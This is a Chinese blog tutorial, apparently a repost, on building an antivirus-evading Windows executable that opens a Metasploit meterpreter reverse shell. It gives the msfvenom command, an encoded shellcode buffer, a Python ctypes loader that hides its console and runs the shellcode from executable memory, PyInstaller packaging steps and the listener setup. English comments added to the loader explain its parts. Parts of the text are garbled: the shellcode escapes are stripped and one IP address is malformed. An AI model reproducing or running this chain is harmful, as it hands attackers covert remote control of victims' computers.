Metasploit+python生成免杀exe过360杀毒

Metasploit+python生成免杀exe过360杀毒

1.在kali下生成一个反弹的msf的python脚本,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102  -e x86/shikata_ga_nai -i 11 -f py -o  /opt/bk.py

2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变)

from ctypes import *

import ctypes

buf =  ""

buf += "xbbx7ax62x0ax22xdbxc9xd9x74x24xf4x58x29"

buf += "xc9xb1x97x31x58x15x03x58x15x83xe8xfcxe2"

buf += "x8fxdcx50xbcx22x5dxbfx0cx65xe9x1bx79xcd"

buf += "x39xadx30x7cx0cx5dx21xfdx87x61x46x2bxc8"

buf += "x35xc0x38x81xbfxd5xb9xd7x14x0cxcbx00x79"

buf += "x12x5dxd0xb1xeexfex06x1dx51x8ax92x29xd2"

buf += "xa4x4cxd0x08x22xdcx4fx24xb2x2bx2bxdax00"

buf += "x5fxa3x1dx01xfexe9xf2x62xebxa7x46x63xce"

buf += "xacx45xe4x8bxa1xa3x85x14xe1x1ex06xa7x6e"

buf += "x7ax03xe7x05xd2x41x32x24x3cx48x72xf2x57"

buf += "x0fx58x58x5cxf6xd5x0fx5bx6bxcax34xddx5d"

buf += "xe0x62x5axc2xdex3dxdcxb3xf0x3ex78x31x90"

buf += "x6cx5fx58xeex84xb0x30x87x60xecx58x25xad"

buf += "x4ax6bxc6xb7xd8x70xb8x2fxc8xd9xcfxecx10"

buf += "xcbx67x90xf2xdfxf2x4axf3x23xf6xd1x12xa5"

buf += "xfbx10xa9x56x4exd0xdcx10x21x1dxb5x58x17"

buf += "xe1x6dx69x74xc7xacx58x1axc9xf7x00xf8x54"

buf += "x76x05x6dxd4x9ex9cx22xdbx0fxa9xfaxe3x8b"

buf += "x8ex1ax1fx60xdbxbexefx2fx73xa5x42x02x93"

buf += "x89x0fx42xfaxaexb9x9bxecxe2x53x56x38x51"

buf += "x45x6fxb8xd2xffx3ax73x44xe4x38x38xf2x28"

buf += "x76xf0xcax34x80x35x55x83xadx29x23x8axca"

buf += "x07xcfx88x30x15x2exc0x99x1exddxb6xbbx49"

buf += "x92x1ex9axddxcfx58xe9x84x66x3dx38xfcx28"

buf += "x99xa4x19x09xe6x1cxf5xadx4fxa1x81xbfx51"

buf += "x3dx0bx9ex27x60x20x7dx59x6ex82x7cx25x5c"

buf += "x4ex34x25xedxc3xb1x45x02x92x75xf5x11xa5"

buf += "x54xdcx1bx6fx9bx56xd2xb5x80x66xcfxe1x61"

buf += "xd1x01xe4x31x52xd9x5bx01x37x29xa8xefxc8"

buf += "x53x9bx1cx47x30x9exe4x6axdaxb3xd5xfdxf5"

buf += "xb8x13xbcx92xbbxb4x82x70x02xadxefx3bx70"

buf += "xf4x98x84x31x52x97x60x2bx2ex84x9bx7fxb7"

buf += "x30x85x58xefx8cx95xa0x56x2fxefx20x61x0d"

buf += "x94x66xbfxa7xd0x71x56x52x82xb1xa0x19xe4"

buf += "x7exd9x90x96x2bx16xeax4cxdexcdx05x23x6e"

buf += "xc2x4bxc0x68x1bxbaxc1x1dxcax26x74xd1x92"

buf += "x4exd3x70x8ax43x41xbex59xf1x20x33x89xb9"

buf += "x2bxdbx9ax0fxadx8dx80x4cx78x52xe7x0axf7"

buf += "x47xd8x5cx0cx3cxd4x0dx3dxe7xbdx2dx22xb1"

buf += "x37x0axd9x5exf2xd5xd2x56xe0x56x1cx42xc3"

buf += "x75x92x55x7cx86x6axb4xcdx3axcex4dxeax4f"

buf += "xa4x31xc6xe0x16x27xa5xf4x9dx79x5exfcx60"

buf += "xebxefx35x33x6ex5bx6dxecx8fx9bx1exb1xf6"

buf += "x35xebx1fx3bxabx99x9ax34x2axf8x25x38xba"

buf += "x40xe9xb0x51xbcxdfx60x16x62xc3x63x64xbd"

buf += "xb5x28xf6x4cx71xd2x01x74x11xf0xd7xcdx4f"

buf += "x34xadxc2x65x4cxebx78xc1xbfxbax80x6cx46"

buf += "x6ax15x15x03x5ex8dx65x8ex69x89x29x7fx67"

buf += "xeaxc1x6bx62xb0xd4"

 

#libc = CDLL('libc.so.6')
# POSIX mprotect() protection flags for the Linux-only helper below.
# With the CDLL line above commented out, `libc` is never bound, so these
# constants (and executable_code) are dead code on the Windows build this
# page targets; the live path is the VirtualAlloc/VirtualProtect sequence
# at module level.

PROT_READ = 1

PROT_WRITE = 2

PROT_EXEC = 4

def executable_code(buffer):

    """Copy *buffer* into a freshly allocated RWX region via libc (POSIX path).

    Relies on a module-level ``libc`` that only appears in the commented-out
    ``CDLL('libc.so.6')`` line above, so calling this as the file stands
    raises NameError; nothing on this page calls it. The valloc -> memmove ->
    mprotect(PROT_READ|PROT_WRITE|PROT_EXEC) sequence is the POSIX counterpart
    of the VirtualAlloc/VirtualProtect loader at module level, and it is the
    same behaviour that memory-protection monitoring keys on.

    Args:
        buffer: payload bytes to copy.

    Returns:
        c_void_p pointing at the RWX region.

    Raises:
        Exception: if allocation or mprotect reports failure (but see the
            note on the NULL check below).
    """

    buf = c_char_p(buffer)

    size = len(buffer)

    addr = libc.valloc(size)

    addr = c_void_p(addr)

    # NOTE: addr is a c_void_p object at this point, so `0 == addr` is never
    # true; a NULL return from valloc is not actually caught here.
    if 0 == addr: 

        raise Exception("Failed to allocate memory")

    memmove(addr, buf, size)

    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):

        raise Exception("Failed to set protection on buffer")

    return addr

# Resolve the two kernel32 entry points used to stage executable memory.
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc

VirtualProtect = ctypes.windll.kernel32.VirtualProtect

# Python 2 str -> mutable buffer (the print statements below are Python 2).
shellcode = bytearray(buf)

# Hide the console window: ShowWindow(hwnd, 0) is SW_HIDE. `666==666` is
# always true, so the inner `if` is a no-op guard. CloseHandle on an HWND is
# questionable — window handles are not kernel-object handles — so that call
# most likely just fails; its return value is not checked.
whnd = ctypes.windll.kernel32.GetConsoleWindow()   

if whnd != 0:

       if 666==666:

              ctypes.windll.user32.ShowWindow(whnd, 0)   

              ctypes.windll.kernel32.CloseHandle(whnd)

# Long filler print; the page gives no reason for it.
print ".................................."*666

# VirtualAlloc(NULL, len, 0x3000, 0x40): 0x3000 = MEM_COMMIT | MEM_RESERVE,
# 0x40 = PAGE_EXECUTE_READWRITE. Requesting a private RWX region in one's own
# process, copying a payload into it and calling it (below) is the canonical
# self-injection sequence that AV/EDR behavioural rules and memory scanners
# look for (RWX page, execution from non-image-backed memory).
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

                                          ctypes.c_int(len(shellcode)),

                                          ctypes.c_int(0x3000),

                                          ctypes.c_int(0x40))

# ctypes char-array view over the bytearray, passed to RtlMoveMemory below.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# VirtualProtect to 0x40 again; the region was already allocated RWX, so this
# is redundant. `old` receives the previous protection value.
old = ctypes.c_long(1)

VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))

# Copy the payload bytes into the executable region.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),

                                     buf,

                                     ctypes.c_int(len(shellcode)))

# Treat the region as a no-argument function and transfer control into it.
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

print "Code By Luan"

shell()

3.在windowsx86上安装支持python的环境,下载pywin32 解压运行,一直点下一步就可以了

4.然后下载支持将python生成exe的软件pyinstaller,解压然后执行以下命令:

D:mianshapyinstaller-2.0>python PyInstaller.py --console --onefile  bk.py

注意这里不要有中文路径,否则会出错

5.执行命令后会在d:pyinstaller-2.0kdist目录生成bk.exe

 

6.这里我将在windowsx86上安装最新的360杀毒软件,进行查杀测试

 

7.然后在kali下启动msf,然后执行以下命令:

use exploit/multi/handler

set lhost 192.168.1.102

set lport 443

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterpreter:

原文地址:https://www.cnblogs.com/backlion/p/6785870.html